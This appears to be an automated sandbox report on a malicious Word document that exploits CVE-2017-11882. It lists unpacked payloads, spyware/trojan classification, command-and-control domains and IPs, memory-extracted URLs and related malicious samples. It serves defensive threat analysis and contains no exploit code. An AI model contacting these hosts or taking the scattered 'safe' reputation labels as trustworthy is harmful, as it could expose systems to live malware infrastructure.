              documenting.doc43%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.RegAskcfcd.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              cybersng.duckdns.org0%VirustotalBrowse
              cy.kl-re.com4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
              http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              https://FTIIlzumA5oOsjQq8.ne0%Avira URL Cloudsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              http://www.dnie.es/dpc00%URL Reputationsafe
              https://www.netlock.hu/docs/0%URL Reputationsafe
              https://www.netlock.hu/docs/0%URL Reputationsafe
              https://www.netlock.hu/docs/0%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.globaltrust.info00%URL Reputationsafe
              http://www.globaltrust.info00%URL Reputationsafe
              http://www.globaltrust.info00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
              http://ca.sia.0%Avira URL Cloudsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.html0%Avira URL Cloudsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
              http://193.239.147.1030%Avira URL Cloudsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              http://ocsp.entrust.net0D0%URL Reputationsafe
              https://FTIIlzumA5oOsjQq8.net0%Avira URL Cloudsafe
              http://KYWxYV.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              http://www.comsign.co.il/cps00%URL Reputationsafe
              http://www.comsign.co.il/cps00%URL Reputationsafe
              http://www.comsign.co.il/cps00%URL Reputationsafe
              http://ca.sia.it/secsrv/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/secsrv/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/secsrv/repository/CRL.der0J0%URL Reputationsafe
              http://cps.chambersign.org/cps/publicnotaryroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/publicnotaryroot.html00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cybersng.duckdns.org
              172.111.202.41
              truefalseunknown
              mail.privateemail.com
              198.54.122.60
              truefalse
                high
                cy.kl-re.com
                unknown
                unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://193.239.147.103/base/D6BA86F557F0B3BF28711AA5C7497D8B.htmlfalse
                • Avira URL Cloud: safe
                unknown
                https://FTIIlzumA5oOsjQq8.nettrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://127.0.0.1:HTTP/1.1RegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSRegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://fedir.comsign.co.il/crl/ComSignCA.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://FTIIlzumA5oOsjQq8.neRegAskcfcd.exe, 00000005.00000002.2363266312.00000000025F9000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://sectigo.com/CPS0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.chambersign.org/chambersroot.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.entrust.net/server1.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                  high
                  http://ocsp.sectigo.com0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ocsp.entrust.net03RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.certicamara.com/certic-RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                    high
                    http://cps.chambersign.org/cps/chambersroot.html0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.dnie.es/dpc0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://www.netlock.hu/docs/RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.chambersign.org1RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://repository.swisssign.com/0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                      high
                      http://www.globaltrust.info0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://mail.privateemail.comRegAskcfcd.exe, 00000005.00000002.2363134886.00000000024B8000.00000004.00000001.sdmpfalse
                        high
                        http://crl.chambersign.org/publicnotaryroot.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlRegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://ca.sia.RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.post.trust.ie/reposit/cps.html0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAskcfcd.exe, 00000004.00000002.2115088871.00000000053C0000.00000002.00000001.sdmp, RegAskcfcd.exe, 00000005.00000002.2366590454.00000000059D0000.00000002.00000001.sdmpfalse
                          high
                          http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0RegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                            high
                            http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.%s.comPARegAskcfcd.exe, 00000004.00000002.2115088871.00000000053C0000.00000002.00000001.sdmp, RegAskcfcd.exe, 00000005.00000002.2366590454.00000000059D0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0ERegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://193.239.147.103RegAskcfcd.exe, 00000004.00000002.2107803267.0000000002161000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0DRegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAskcfcd.exe, 00000004.00000002.2107803267.0000000002161000.00000004.00000001.sdmpfalse
                              high
                              https://secure.comodo.com/CPS0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                                high
                                http://KYWxYV.comRegAskcfcd.exe, 00000005.00000002.2362764617.0000000002161000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipRegAskcfcd.exefalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://crl.entrust.net/2048ca.crl0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.comsign.co.il/cps0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://ca.sia.it/secsrv/repository/CRL.der0JRegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://cps.chambersign.org/cps/publicnotaryroot.html0RegAskcfcd.exe, 00000005.00000002.2366867370.0000000005DC6000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.e-trust.be/CPS/QNcertsRegAskcfcd.exe, 00000005.00000002.2367858636.0000000007520000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  193.239.147.103
                                  unknownBrunei Darussalam
                                  35913DEDIPATH-LLCUSfalse
                                  172.111.202.41
                                  unknownUnited States
                                  39122BLACKNIGHT-ASIEfalse
                                  198.54.122.60
                                  unknownUnited States
                                  22612NAMECHEAP-NETUSfalse

                                  General Information

                                  Joe Sandbox Version:31.0.0 Emerald
                                  Analysis ID:345146
                                  Start date:27.01.2021
                                  Start time:19:05:09
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 7m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:documenting.doc
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winDOC@6/15@9/3
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 1.6% (good quality ratio 1.3%)
                                  • Quality average: 68.9%
                                  • Quality standard deviation: 35.4%
                                  HCA Information:
                                  • Successful, ratio: 97%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .doc
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 95.101.27.171, 95.101.27.163
                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  19:05:38API Interceptor49x Sleep call for process: EQNEDT32.EXE modified
                                  19:05:41API Interceptor1243x Sleep call for process: RegAskcfcd.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  193.239.147.103Overdue_invoices.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
                                  SIT-10295.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/759EFD3939882C342360C054C0B0F139.html
                                  MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/FF20D3DCE8649E687BDAC089AF53336F.html
                                  RFQ Tengco_270121.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/ED373B21DE74B174904C90C4F88850ED.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/817B8D2BFEA38CDAF771C594C8EDD2E5.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D11F9AABDFF0704F9266CD718DBD402A.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/D1A437E767757AD4AED3D462BF223DC7.html
                                  Shipping Documents.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  8Aobnx1VRi.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3CC85C5A6F2A98A2641549BF1564DA9E.html
                                  DSksIiT85D.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/84BABA4BCDFD79499D4EFDE97172FE7F.html
                                  SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/4360BD50C79123B72BE98F9871724C8D.html
                                  Updated Invoice{swift..exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/3815F0F23310F1653DD4231C92F53862.html
                                  mr kesh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/B690B5BB2DC34BEDA854B2E34C821BF0.html
                                  SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/AC74DA1A537FAA26238A4038BDCC34AA.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/A835403D21646D38831BEFB4AACEE40A.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.mh.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                  SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/8C0599C1B9B3E6070FB750C30A6E4DE5.html
                                  SecuriteInfo.com.Artemis326CF1417127.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/C153CE1CCAD2548C2547CF3FCE5D339E.html
                                  Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                  • 193.239.147.103/base/8DE336D63584EEF9B2E4A84C87518330.html
                                  DHL SHIPPING INVOICE DOCUMENTS.docGet hashmaliciousBrowse
                                  • 193.239.147.103/base/CFA32E9D22202129AAEAB33745DD6268.html
                                  198.54.122.60RFQ Tengco_270121.docGet hashmaliciousBrowse
                                    74725794.exeGet hashmaliciousBrowse
                                      pickup receipt,DOC.exeGet hashmaliciousBrowse
                                        Pi_74725794.exeGet hashmaliciousBrowse
                                          74725794.exeGet hashmaliciousBrowse
                                            New FedEx paper work review.exeGet hashmaliciousBrowse
                                              New paper work document attached.exeGet hashmaliciousBrowse
                                                DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                  PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                      gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                        DHL7472579410110100.PDF.exeGet hashmaliciousBrowse
                                                          PO-104_171220.exeGet hashmaliciousBrowse
                                                            DHL_document11022020680908911.doc.exeGet hashmaliciousBrowse
                                                              EOI5670995098732.exeGet hashmaliciousBrowse
                                                                INQUIRY- NET MACHINES-122020.docGet hashmaliciousBrowse
                                                                  EE09TR0098654.exeGet hashmaliciousBrowse
                                                                    ENS003.xlsGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Trojan.Inject4.6124.20146.exeGet hashmaliciousBrowse
                                                                        RivHwa3Ral.exeGet hashmaliciousBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          cybersng.duckdns.orgRFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                          • 104.37.4.35
                                                                          BRANDCARE ORDER.docGet hashmaliciousBrowse
                                                                          • 104.37.4.35
                                                                          http://ng.openmicchallenge.com/zankuqw/Y29saW4ubWFjZG9uYWxkQGJyaXRpc2hnYXMuY28udWs=Get hashmaliciousBrowse
                                                                          • 104.250.180.10
                                                                          mail.privateemail.comRFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          74725794.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          Enq No 34 22-01-2021.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          pickup receipt,DOC.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Trojan.nm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.qm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.lm.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          Pi_74725794.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          74725794.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          New FedEx paper work review.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          New paper work document attached.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          DHL_AWB_1928493383.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          PGXPHWCclJQdkUDcrlQETWlRbmXQw.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          SecuriteInfo.com.BehavesLike.Win32.Generic.tc.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          gc2hl6HPAVH5h1p.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60
                                                                          DHL7472579410110100.PDF.exeGet hashmaliciousBrowse
                                                                          • 198.54.122.60

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          DEDIPATH-LLCUSOverdue_invoices.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          Tender documents_FOB_Offer_Printout.PDF.exeGet hashmaliciousBrowse
                                                                          • 45.15.143.189
                                                                          SIT-10295.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          MT103_SWFT012621ONOMN.docGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          RFQ Tengco_270121.docGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.25689.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.27958.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          Shipping Documents.docGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          8Aobnx1VRi.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
                                                                          DSksIiT85D.exeGet hashmaliciousBrowse
                                                                          • 193.239.147.103
